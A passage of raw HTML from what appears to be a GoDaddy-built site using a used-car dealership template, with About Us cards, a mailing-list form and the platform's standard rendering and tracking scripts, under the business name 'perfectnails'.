c1-1c c1-1e c1-5e c1-5f c1-5g c1-5h c1-b c1-52 c1-5i c1-2u c1-5j c1-5k c1-5l c1-5m x-rt"><p style="margin:0"><span class="x-el x-el-span c1-5t c1-5u c1-b c1-5i c1-5j c1-5k c1-5l c1-5m">We'll help find the perfect car for you!</span></p></div><div style="max-width:100%"><a tcclTracking="click" data-ux="Button" data-aid="HEADER_CTA_BTN" href="/" target="" data-tccl="ux2.header.cta_button.click,click" data-page="a9f148e7-6b12-4d36-95f0-1b4a4be338a5" data-typography="ButtonAlpha" class="x-el x-el-a c1-5v c1-1z c1-5w c1-4r c1-3o c1-5x c1-5y c1-5z c1-60 c1-n c1-61 c1-1g c1-3r c1-2d c1-1t c1-2g c1-1u c1-2e c1-z c1-4 c1-62 c1-b c1-63 c1-5o c1-4b c1-22 c1-64 c1-65 c1-66 c1-27 c1-28 c1-29 c1-2a">Book Online</a></div></div></div></div></div><script>Number(window.vctElements)||(window.vctElements=0),window.vctElements++;new guacImage("//img1.wsimg.com/isteam/stock/55438/:/rs=w:{width},h:{height},cg:true,m/cr=w:{width},h:{height},a:cc",document.getElementById('guacBg35376'),{"useTreatmentData":true,"backgroundLayers":["linear-gradient(to bottom, rgba(22, 22, 22, 0.25) 0%, rgba(22, 22, 22, 0.25) 100%)"],"shouldMarkVisuallyComplete":true})</script></div></div></div></div></section> </div></div></div><div id="48f5be3e-b678-405b-89a5-442b053988c0" class="widget widget-about widget-about-about-3"><div data-ux="Widget" role="region" class="x-el x-el-div x-el c1-1 c1-2 c1-h c1-b c1-c c1-d c1-e c1-f c1-g c1-1 c1-2 c1-b c1-c c1-d c1-e c1-f c1-g"><div> <section data-ux="Section" class="x-el x-el-section c1-1 c1-2 c1-h c1-i c1-j c1-b c1-c c1-l c1-m c1-d c1-e c1-f c1-g"><div data-ux="Container" class="x-el x-el-div c1-1 c1-2 c1-v c1-w c1-x c1-y c1-z c1-b c1-c c1-12 c1-d c1-4m c1-e c1-16 c1-f c1-17 c1-g"><h1 role="heading" aria-level="1" data-ux="SectionHeading" data-aid="ABOUT_SECTION_TITLE_RENDERED" data-promoted-from="2" data-order="0" data-typography="HeadingBeta" class="x-el x-el-h1 c1-1 c1-1z c1-2e c1-1u c1-67 c1-2q c1-2r c1-1c c1-68 c1-o c1-1t c1-21 c1-36 c1-69 c1-2u c1-37 c1-6a c1-38 c1-39 c1-3a"><span data-ux="Element" class="">About Us</span></h1><div data-ux="Grid" class="x-el x-el-div c1-1 c1-2 c1-18 c1-19 c1-1a c1-6d c1-1c c1-1d c1-6e c1-1f c1-3r c1-b c1-c c1-1h c1-1i c1-6f c1-1k c1-d c1-e c1-f c1-g"><div data-ux="GridCell" class="x-el x-el-div c1-1 c1-2 c1-19 c1-1m c1-1n c1-6g c1-z c1-1p c1-1q c1-6h c1-1s c1-b c1-c c1-1v c1-1w c1-6i c1-1y c1-d c1-e c1-f c1-g"><div data-ux="ContentCard" index="0" id="707b277b-857f-4a89-bb2b-832329be7ca8" class="x-el x-el-div x-el c1-1 c1-2 c1-n c1-18 c1-4c c1-1g c1-1t c1-3j c1-4 c1-6j c1-6k c1-4t c1-b c1-c c1-6l c1-6m c1-d c1-e c1-f c1-g c1-1 c1-2 c1-b c1-c c1-d c1-e c1-f c1-g"><h4 role="heading" aria-level="4" data-ux="ContentCardHeading" data-aid="ABOUT_HEADLINE_RENDERED0" data-typography="HeadingDelta" class="x-el x-el-h4 c1-1 c1-2 c1-2e c1-1u c1-6n c1-2q c1-2r c1-1c c1-1e c1-b c1-52 c1-5i c1-2u c1-5j c1-5k c1-5l c1-5m">Top Used Vehicles</h4><div data-ux="ContentCardText" data-aid="ABOUT_DESCRIPTION_RENDERED0" data-typography="BodyAlpha" class="x-el x-el-p c1-1 c1-2 c1-2e c1-1u c1-5d c1-1c c1-1e c1-6o c1-6p c1-6q c1-6r c1-6s c1-6t c1-6u c1-6v c1-6w c1-6x c1-6y c1-6z c1-70 c1-71 c1-72 c1-73 c1-74 c1-75 c1-76 c1-77 c1-78 c1-79 c1-7a c1-7b c1-7c c1-7d c1-7e c1-7f c1-1m c1-b c1-7g c1-c c1-2u c1-d c1-e c1-f c1-g x-rt"><p style="margin:0"><span class="x-el x-el-span c1-5t c1-5u c1-b c1-c c1-d c1-e c1-f c1-g">At our dealership, we stock our lot with pre-owned vehicles. We service our own vehicles to make sure they are in road-ready shape. Interested in our of our vehicles? Ask for a test drive!</span></p></div></div></div><div data-ux="GridCell" class="x-el x-el-div c1-1 c1-2 c1-19 c1-1m c1-1n c1-6g c1-z c1-1p c1-1q c1-6h c1-1s c1-b c1-c c1-7h c1-7i c1-1v c1-1w c1-6i c1-1y c1-d c1-e c1-f c1-g"><div data-ux="ContentCard" index="1" id="ace2836e-6c25-4c82-9196-fa58116fe4a4" class="x-el x-el-div x-el c1-1 c1-2 c1-n c1-18 c1-4c c1-1g c1-1t c1-3j c1-4 c1-6j c1-6k c1-4t c1-b c1-c c1-6l c1-6m c1-d c1-e c1-f c1-g c1-1 c1-2 c1-b c1-c c1-d c1-e c1-f c1-g"><h4 role="heading" aria-level="4" data-ux="ContentCardHeading" data-aid="ABOUT_HEADLINE_RENDERED1" data-typography="HeadingDelta" class="x-el x-el-h4 c1-1 c1-2 c1-2e c1-1u c1-6n c1-2q c1-2r c1-1c c1-1e c1-b c1-52 c1-5i c1-2u c1-5j c1-5k c1-5l c1-5m">Friendly Staff</h4><div data-ux="ContentCardText" data-aid="ABOUT_DESCRIPTION_RENDERED1" data-typography="BodyAlpha" class="x-el x-el-p c1-1 c1-2 c1-2e c1-1u c1-5d c1-1c c1-1e c1-6o c1-6p c1-6q c1-6r c1-6s c1-6t c1-6u c1-6v c1-6w c1-6x c1-6y c1-6z c1-70 c1-71 c1-72 c1-73 c1-74 c1-75 c1-76 c1-77 c1-78 c1-79 c1-7a c1-7b c1-7c c1-7d c1-7e c1-7f c1-1m c1-b c1-7g c1-c c1-2u c1-d c1-e c1-f c1-g x-rt"><p style="margin:0"><span class="x-el x-el-span c1-5t c1-5u c1-b c1-c c1-d c1-e c1-f c1-g">From the moment you arrive on our lot to when you get the new keys to your vehicle, our staff is there to ensure you have an enjoyable experience. They have decades of experience between them, so don't be afraid to get your questions answered!</span></p></div></div></div><div data-ux="GridCell" class="x-el x-el-div c1-1 c1-2 c1-19 c1-1m c1-1n c1-6g c1-z c1-1p c1-1q c1-6h c1-1s c1-b c1-c c1-7h c1-7i c1-1v c1-1w c1-6i c1-1y c1-d c1-e c1-f c1-g"><div data-ux="ContentCard" index="2" id="06e6a477-6b14-4d06-83a6-26973fc6b831" class="x-el x-el-div x-el c1-1 c1-2 c1-n c1-18 c1-4c c1-1g c1-1t c1-3j c1-4 c1-6j c1-6k c1-4t c1-b c1-c c1-6l c1-6m c1-d c1-e c1-f c1-g c1-1 c1-2 c1-b c1-c c1-d c1-e c1-f c1-g"><h4 role="heading" aria-level="4" data-ux="ContentCardHeading" data-aid="ABOUT_HEADLINE_RENDERED2" data-typography="HeadingDelta" class="x-el x-el-h4 c1-1 c1-2 c1-2e c1-1u c1-6n c1-2q c1-2r c1-1c c1-1e c1-b c1-52 c1-5i c1-2u c1-5j c1-5k c1-5l c1-5m">Our Financing Program</h4><div data-ux="ContentCardText" data-aid="ABOUT_DESCRIPTION_RENDERED2" data-typography="BodyAlpha" class="x-el x-el-p c1-1 c1-2 c1-2e c1-1u c1-5d c1-1c c1-1e c1-6o c1-6p c1-6q c1-6r c1-6s c1-6t c1-6u c1-6v c1-6w c1-6x c1-6y c1-6z c1-70 c1-71 c1-72 c1-73 c1-74 c1-75 c1-76 c1-77 c1-78 c1-79 c1-7a c1-7b c1-7c c1-7d c1-7e c1-7f c1-1m c1-b c1-7g c1-c c1-2u c1-d c1-e c1-f c1-g x-rt"><p style="margin:0"><span class="x-el x-el-span c1-5t c1-5u c1-b c1-c c1-d c1-e c1-f c1-g">Are you looking to take out a loan for your next vehicle? Avoid spending time traveling to credit unions, and apply for a loan with us! We guarantee fixed loan repayment terms that will only change if both the customer and our financial department agree.&nbsp;</span></p></div></div></div></div></div></section> </div></div></div><div id="32ea1d72-6fe8-4303-ade4-1171f016e142" class="widget widget-subscribe widget-subscribe-subscribe-1"><div data-ux="Widget" role="region" class="x-el x-el-div x-el c1-1 c1-2 c1-s c1-b c1-c c1-d c1-e c1-f c1-g c1-1 c1-2 c1-b c1-c c1-d c1-e c1-f c1-g"><div> <section data-ux="Section" class="x-el x-el-section c1-1 c1-2 c1-s c1-i c1-j c1-b c1-c c1-l c1-m c1-d c1-e c1-f c1-g"><div data-ux="Container" class="x-el x-el-div c1-1 c1-2 c1-v c1-w c1-x c1-y c1-z c1-b c1-c c1-12 c1-d c1-4m c1-e c1-16 c1-f c1-17 c1-g"><h2 role="heading" aria-level="2" data-ux="SectionBannerHeading" data-aid="SECTION_TITLE_REND" data-typography="HeadingBeta" class="x-el x-el-h2 c1-1 c1-1z c1-2e c1-1u c1-6n c1-2q c1-2r c1-7j c1-7k c1-1t c1-21 c1-36 c1-2s c1-2u c1-37 c1-4p c1-38 c1-39 c1-3a">Join Our Mailing List</h2><div><div id="32ea1d72-6fe8-4303-ade4-1171f016e142-bootstrap-container"><span data-ux="Element" class="x-el x-el-span c1-1 c1-2 c1-b c1-c c1-d c1-e c1-f c1-g"><div data-ux="Grid" data-aid="SUBSCRIBE_INNER_FORM_REND" class="x-el x-el-div c1-1 c1-2 c1-18 c1-19 c1-1a c1-6d c1-1c c1-1d c1-1e c1-1f c1-b c1-c c1-1h c1-1i c1-1j c1-1k c1-d c1-e c1-f c1-g"><div data-ux="GridCell" class="x-el x-el-div c1-1 c1-2 c1-19 c1-1m c1-1n c1-3g c1-z c1-1p c1-1q c1-1r c1-1s c1-b c1-c c1-7l c1-7m c1-7n c1-1v c1-1w c1-1x c1-1y c1-d c1-7o c1-7p c1-7q c1-e c1-f c1-g"><p data-ux="Text" data-aid="FORM_DESC_REND" data-typography="BodyAlpha" class="x-el x-el-p c1-1 c1-2 c1-2e c1-1u c1-5d c1-1c c1-7r c1-1t c1-b c1-7s c1-c c1-2u c1-d c1-e c1-f c1-g">Be the first to hear about the newest models, upcoming sales, and special discounts.</p><form aria-live="polite" data-ux="InputGroup" class="x-el x-el-form x-el c1-1 c1-2 c1-b c1-c c1-d c1-e c1-f c1-g c1-1 c1-2 c1-1e c1-b c1-c c1-d c1-e c1-f c1-g"><div data-ux="Block" class="x-el x-el-div c1-1 c1-2 c1-18 c1-4c c1-b c1-c c1-7t c1-d c1-e c1-f c1-g"><div data-ux="Block" class="x-el x-el-div c1-1 c1-2 c1-18 c1-1m c1-7u c1-b c1-c c1-7v c1-7w c1-d c1-e c1-f c1-g"> <div data-ux="InputFloatLabel" class="x-el x-el-div c1-1 c1-2 c1-n c1-4 c1-b c1-c c1-7x c1-7y c1-d c1-e c1-f c1-g"><input type="text" role="textbox" aria-multiline="false" data-ux="InputFloatLabel" id="input35380" value="" data-typography="InputAlpha" class="x-el x-el-input c1-1 c1-2 c1-h c1-7z c1-4 c1-80 c1-81 c1-82 c1-83 c1-84 c1-85 c1-86 c1-87 c1-88 c1-89 c1-b c1-8a c1-22 c1-2u c1-8b c1-8c c1-8d c1-8e c1-8f c1-8g c1-8h c1-8i c1-8j c1-8k c1-8l c1-7x c1-7y c1-27 c1-28 c1-29 c1-2a"/><label data-ux="InputFloatLabelLabel" for="input35380" data-typography="InputAlpha" class="x-el x-el-label c1-1 c1-2 c1-2e c1-1u c1-33 c1-8m c1-8n c1-8o c1-8p c1-b c1-8q c1-22 c1-2u c1-27 c1-28 c1-29 c1-2a">Email</label></div> </div><button tcclTracking="click" data-ux="Button" type="submit" data-tccl="ux2.gem-subscribe.submit_form.click,click" data-aid="SUBSCRIBE_SUBMIT_BUTTON_REND" data-typography="ButtonAlpha" class="x-el x-el-button c1-5v c1-1z c1-5w c1-4r c1-3o c1-5x c1-5y c1-5z c1-60 c1-n c1-61 c1-1g c1-3r c1-2d c1-1t c1-2g c1-1u c1-2e c1-z c1-4 c1-2q c1-2r c1-b c1-63 c1-5o c1-4b c1-22 c1-64 c1-65 c1-55 c1-57 c1-66 c1-7v c1-7w c1-8r c1-27 c1-28 c1-29 c1-2a">Sign up</button></div></form></div></div></span></div></div></div></section> </div></div></div><div id="55a81bc3-d4d9-465a-94ec-ee7463736f03" class="widget widget-footer widget-footer-footer-4"><div data-ux="Widget" role="contentinfo" class="x-el x-el-div x-el c1-1 c1-2 c1-h c1-b c1-c c1-d c1-e c1-f c1-g c1-1 c1-2 c1-b c1-c c1-d c1-e c1-f c1-g"><div> <section data-ux="Section" class="x-el x-el-section c1-1 c1-2 c1-h c1-i c1-j c1-b c1-c c1-l c1-m c1-d c1-e c1-f c1-g"><div data-ux="Container" class="x-el x-el-div c1-1 c1-2 c1-v c1-w c1-x c1-y c1-z c1-b c1-c c1-12 c1-d c1-4m c1-e c1-16 c1-f c1-17 c1-g"><div data-ux="Layout" class="x-el x-el-div c1-1 c1-2 c1-1t c1-b c1-c c1-d c1-e c1-f c1-g"><div data-ux="Container" class="x-el x-el-div c1-1 c1-2 c1-v c1-w c1-x c1-y c1-z c1-r c1-b c1-c c1-8s c1-12 c1-d c1-4m c1-e c1-16 c1-f c1-17 c1-g"><div data-ux="Container" class="x-el x-el-div c1-1 c1-2 c1-v c1-w c1-x c1-y c1-z c1-1t c1-8t c1-8u c1-b c1-c c1-12 c1-d c1-4m c1-e c1-16 c1-f c1-17 c1-g"><ul data-ux="NavFooter" class="x-el x-el-ul c1-1 c1-2 c1-8v c1-1p c1-3h c1-1r c1-3i c1-1c c1-2r c1-1e c1-2q c1-4z c1-b c1-c c1-24 c1-8w c1-d c1-e c1-f c1-g"></ul></div><p data-ux="FooterText" data-aid="FOOTER_BUSINESS_NAME_RENDERED" data-typography="BodyAlpha" class="x-el x-el-p c1-1 c1-2 c1-2e c1-1u c1-5d c1-1c c1-7r c1-5o c1-b c1-52 c1-c c1-d c1-e c1-f c1-g">perfectnails</p></div><div data-ux="Grid" class="x-el x-el-div c1-1 c1-2 c1-18 c1-19 c1-1a c1-6d c1-1c c1-2r c1-1e c1-2q c1-1g c1-1t c1-b c1-c c1-d c1-e c1-f c1-g"><div data-ux="GridCell" class="x-el x-el-div c1-1 c1-2 c1-19 c1-1m c1-1n c1-6g c1-z c1-1p c1-3h c1-1r c1-3i c1-b c1-c c1-d c1-8x c1-8y c1-e c1-f c1-g"><div data-ux="FooterDetails" data-aid="FOOTER_COPYRIGHT_RENDERED" data-typography="DetailsAlpha" class="x-el x-el-p c1-1 c1-2 c1-2e c1-1u c1-5d c1-1c c1-1e c1-b c1-8z c1-22 c1-2u c1-27 c1-90 c1-28 c1-29 c1-2a x-rt"><p style="margin:0"><span>Copyright © 2020 perfectnails - All Rights Reserved.</span></p></div></div><div data-ux="GridCell" class="x-el x-el-div c1-1 c1-2 c1-19 c1-1m c1-1n c1-6g c1-z c1-1p c1-3h c1-1r c1-3i c1-b c1-c c1-d c1-8x c1-8y c1-e c1-f c1-g"><p data-ux="FooterDetails" data-aid="FOOTER_POWERED_BY_RENDERED" data-typography="DetailsAlpha" class="x-el x-el-p c1-1 c1-2 c1-2e c1-1u c1-5d c1-62 c1-1e c1-b c1-8z c1-22 c1-2u c1-27 c1-91 c1-4p c1-28 c1-29 c1-2a"><span>Powered by GoDaddy <a rel="nofollow noopener" role="link" aria-haspopup="true" data-ux="Link" target="_blank" data-aid="FOOTER_POWERED_BY_RENDERED_LINK" href="https://www.godaddy.com/websites/website-builder?isc=pwugc&amp;utm_source=wsb&amp;utm_medium=applications&amp;utm_campaign=en-us_corp_applications_base" data-typography="LinkAlpha" class="x-el x-el-a c1-2b c1-2c c1-2d c1-2e c1-1u c1-2f c1-2g c1-62 c1-b c1-92 c1-22 c1-2m c1-93 c1-94 c1-27 c1-91 c1-4p c1-28 c1-29 c1-2a" data-tccl="ux2.FOOTER.footer4.Layout.Default.Link.Default.35381.click,click">Website Builder</a></span></p></div></div></div></div><div id="bs-8"></div></section> </div></div></div><div id="bdb594c8-3492-4532-9262-e4db919aa449" class="widget widget-messaging widget-messaging-messaging-1"><div id="bs-9"><div data-ux="Block" class="x-el x-el-div c1-1 c1-2 c1-95 c1-96 c1-97 c1-98 c1-99 c1-9a c1-b c1-c c1-d c1-e c1-f c1-g"><div data-ux="Block" data-aid="MESSAGING_FAB" data-edit-interactive="true" data-tccl="ux2.messaging.fab.click,click" class="x-el x-el-div c1-1 c1-2 c1-18 c1-1g c1-3r c1-2g c1-4 c1-9b c1-9c c1-5z c1-9d c1-9e c1-b c1-c c1-d c1-e c1-f c1-g"><svg viewBox="0 0 24 24" fill="currentColor" width="44" height="44" data-ux="Icon" class="x-el x-el-svg c1-1 c1-2 c1-63 c1-20 c1-46 c1-b c1-c c1-d c1-e c1-f c1-g"><g fill="currentColor"><rect x="4" y="6" width="16" height="10.222" rx="1.129"></rect><path d="M8.977 18.578l.2-2.722a.564.564 0 01.564-.523h3.61c.548 0 .774.705.327 1.024l-3.81 2.721a.564.564 0 01-.89-.5z"></path></g></svg></div></div></div></div></div></div></div>
<script type="text/javascript" src="//img1.wsimg.com/ceph-p3-01/website-builder-data-prod/static/widgets/UX.3.59.0.js" crossorigin></script>
<script type="text/javascript">window.cxs && window.cxs.setOptions({ prefix: "c2-" });</script>
<script type="text/javascript" src="//img1.wsimg.com/blobby/go/gpub/651b04fb956e98da/script.js" crossorigin></script>
<script type="text/javascript" src="//img1.wsimg.com/blobby/go/gpub/501ee1531673d40b/script.js" crossorigin></script>
<script type="text/javascript">window.wsb['context-bs-1']={"renderMode":"PUBLISH","fonts":["archivo-black","default",""],"colors":["#595d61"],"fontScale":"medium","locale":"en-US","language":"en","internalLinks":{},"isHomepage":true,"navigationMap":{"a9f148e7-6b12-4d36-95f0-1b4a4be338a5":{"isFlyoutMenu":false,"active":true,"pageId":"a9f148e7-6b12-4d36-95f0-1b4a4be338a5","name":"Home","href":"\u002F","target":"","visible":true,"requiresAuth":false,"tags":[],"rel":"","type":"page","showInFooter":false}},"theme":"Theme10"};</script>
<script type="text/javascript">(function(props,context) {
        Core.utils.renderBootstrap({
          elId:'bs-1',
          componentName:'DynamicFontScaler',
          props:props,
          context:context,
          contextKey:'context-bs-1',
          radpack:""
        });
      })({"text":"perfectnails","containerId":"logo-container-35362","targetId":"logo-text-35363","fontSizes":["xxlarge","xlarge","large"],"style":{"display":"inline-block","maxWidth":"100%"},"widgetId":"332e3eac-00db-46ff-b558-919c4bbb1074","section":"alt","category":"accent","locale":"en-US","renderMode":"PUBLISH"},{"widgetId":"332e3eac-00db-46ff-b558-919c4bbb1074","widgetType":"HEADER","widgetPreset":"header9","section":"alt","category":"accent","fontSize":"medium","fontFamily":"alternate","group":"Logo","groupType":"Default","themeOverrides":{}});</script>
<script type="text/javascript" src="//img1.wsimg.com/blobby/go/gpub/992197d1a900c04c/script.js" crossorigin></script>
<script type="text/javascript" src="//img1.wsimg.com/blobby/go/ee364d8f-0a94-4dfc-a692-9b966e609062/gpub/52d13ff9b25c7080/script.js" crossorigin></script>
<script type="text/javascript">(function(props,context) {
        Core.utils.renderBootstrap({
          elId:'bs-3',
          componentName:'DynamicFontScaler',
          props:props,
          context:context,
          contextKey:'context-bs-1',
          radpack:""
        });
      })({"text":"perfectnails","containerId":"logo-container-35370","targetId":"logo-text-35371","fontSizes":["xxlarge","xlarge","large"],"style":{"display":"inline-block","maxWidth":"100%"},"widgetId":"332e3eac-00db-46ff-b558-919c4bbb1074","section":"alt","category":"accent","locale":"en-US","renderMode":"PUBLISH"},{"widgetId":"332e3eac-00db-46ff-b558-919c4bbb1074","widgetType":"HEADER","widgetPreset":"header9","section":"alt","category":"accent","fontSize":"medium","fontFamily":"alternate","group":"Logo","groupType":"Default","themeOverrides":{}});</script>
<script type="text/javascript" src="//img1.wsimg.com/blobby/go/ee364d8f-0a94-4dfc-a692-9b966e609062/gpub/5b4fc2869d44e7a0/script.js" crossorigin></script>
<script type="text/javascript" src="//img1.wsimg.com/blobby/go/gpub/eb031feddb815e74/script.js" crossorigin></script>
<script type="text/javascript">(function(props,context) {
        Core.utils.renderBootstrap({
          elId:'bs-5',
          componentName:'Parallax',
          props:props,
          context:context,
          contextKey:'context-bs-1',
          radpack:""
        });
      })({"speed":-1.5,"uniqueId":"header_parallax35375","noTransform":true,"excludedBreakpoints":[],"viewDevice":"","widgetId":"332e3eac-00db-46ff-b558-919c4bbb1074","section":"default","category":"accent","locale":"en-US","renderMode":"PUBLISH"},{"widgetId":"332e3eac-00db-46ff-b558-919c4bbb1074","widgetType":"HEADER","widgetPreset":"header9","section":"default","category":"accent","fontSize":"medium","fontFamily":"alternate","group":"Section","groupType":"Default","themeOverrides":{}});</script>
<script type="text/javascript">(function(props,context) {
        Core.utils.renderBootstrap({
          elId:'bs-6',
          componentName:'Parallax',
          props:props,
          context:context,
          contextKey:'context-bs-1',
          radpack:""
        });
      })({"isBackground":false,"speed":-1.5,"oversizeSpeed":1.5,"uniqueId":"header_parallax35377","excludedBreakpoints":[],"viewDevice":"","widgetId":"332e3eac-00db-46ff-b558-919c4bbb1074","section":"overlay","category":"accent","locale":"en-US","renderMode":"PUBLISH"},{"widgetId":"332e3eac-00db-46ff-b558-919c4bbb1074","widgetType":"HEADER","widgetPreset":"header9","section":"overlay","category":"accent","fontSize":"medium","fontFamily":"alternate","group":"HeaderMedia","groupType":"Fill","themeOverrides":{}});</script>
<script type="text/javascript">(function(props,context) {
        Core.utils.renderBootstrap({
          elId:'bs-7',
          componentName:'DynamicFontScaler',
          props:props,
          context:context,
          contextKey:'context-bs-1',
          radpack:""
        });
      })({"font":"primary","text":"Quality Cars, Quality Care","containerId":"tagline-container-35378","targetId":"dynamic-tagline-35379","fontSizes":["xxxlarge","xxlarge","xlarge"],"maxLines":4,"style":{"display":"inline-block","maxWidth":"100%","whiteSpace":"pre-line"},"widgetId":"332e3eac-00db-46ff-b558-919c4bbb1074","section":"default","category":"accent","locale":"en-US","renderMode":"PUBLISH"},{"widgetId":"332e3eac-00db-46ff-b558-919c4bbb1074","widgetType":"HEADER","widgetPreset":"header9","section":"default","category":"accent","fontSize":"medium","fontFamily":"primary","group":"Hero","groupType":"Center","themeOverrides":{}});</script>
<script type="text/javascript">Number(window.vctElements)||(window.vctElements=0),window.vctElements++,window.markVisuallyComplete();</script>
<script type="text/javascript" src="//img1.wsimg.com/blobby/go/gpub/623088c5c936f441/script.js" crossorigin></script>
<script type="text/javascript" src="//img1.wsimg.com/blobby/go/ee364d8f-0a94-4dfc-a692-9b966e609062/gpub/e3baaba9912c6214/script.js" crossorigin></script>
<script type="text/javascript" src="//img1.wsimg.com/blobby/go/gpub/9a56e059f72bb839/script.js" crossorigin></script>
<script type="text/javascript" src="//img1.wsimg.com/blobby/go/ee364d8f-0a94-4dfc-a692-9b966e609062/gpub/990169ecb948dfc1/script.js" crossorigin></script>
<script type="text/javascript" src="//img1.wsimg.com/blobby/go/gpub/e966914b5d1e2d43/script.js" crossorigin></script>
<script type="text/javascript" src="//img1.wsimg.com/blobby/go/ee364d8f-0a94-4dfc-a692-9b966e609062/gpub/8758f52b42b2c691/script.js" crossorigin></script>
<script type="text/javascript">document.getElementById('page-35356').addEventListener('click', function() {}, false);</script>
<script type="text/javascript">function tccl_dpsid(){for(var t="dps_site_id=",i=document.cookie.split(";"),e=0;e<i.length;e++){for(var n=i[e];" "==n.charAt(0);)n=n.substring(1);if(0==n.indexOf(t))return n.substring(t.length,n.length)}return null}_trfd.push({"tccl.baseHost":"secureserver.net"}),_trfd.push({"websiteId":"ee364d8f-0a94-4dfc-a692-9b966e609062"}),_trfd.push({"pd":"2020-06-20T07:54:59.330Z"}),_trfd.push({ap:"IPv2",ds:tccl_dpsid()||"-1"});function addTccl(){if(Number(window.vctElements)&&!window.VISUAL_COMPLETE){setTimeout(addTccl,500)}else{var t=document.createElement("script");t.setAttribute("src","//img1.wsimg.com/tcc/tcc_l.combined.1.0.6.min.js");document.body.appendChild(t)}}addTccl();_trfd.push({"meta.numWidgets":3,"meta.theme":"layout10","meta.headerMediaType":"Image","meta.isOLS":false,"meta.isOLA":false,"meta.isMembership":false})</script></body></html>